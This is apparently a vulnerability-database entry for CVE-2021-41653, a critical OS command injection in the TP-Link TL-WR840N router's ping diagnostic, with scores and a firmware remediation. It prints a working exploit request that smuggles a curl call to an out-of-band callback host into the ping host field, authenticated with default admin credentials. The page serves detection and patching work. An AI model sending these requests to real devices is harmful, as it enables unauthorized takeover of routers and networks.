🔙 목록으로 돌아가기

CVE-2021-41653: TP-Link - OS Command Injection

TitleTP-Link - OS Command Injection
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
RemediationUpgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
CVSS Score9.8
EPSS Score0.91914
CVE IDCVE-2021-41653
CWE IDCWE-94
Tags cve2021 cve tplink rce router tp-link vkev vuln

🔍 Vulnerability Description

The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.

🌐 HTTP Request

POST /cgi?2 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
Connection: close
Content-Length: 254
Content-Type: text/plain
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Referer: http://www.victim.com/mainFrame.htm
Accept-Encoding: gzip

[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6

dataBlockSize=64

timeout=1

numberOfRepetitions=4

host=$(echo 127.0.0.1; curl http://d5jo6a1le0o2oa7moolgxggbg193drb1b.oast.online -H 'User-Agent: UTVl1m')

X_TP_ConnName=ewan_ipoe_d

diagnosticsState=Requested
POST /cgi?7 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Content-Length: 42
Content-Type: text/plain
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Referer: http://www.victim.com/mainFrame.htm
Accept-Encoding: gzip

[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41653.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-41653.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A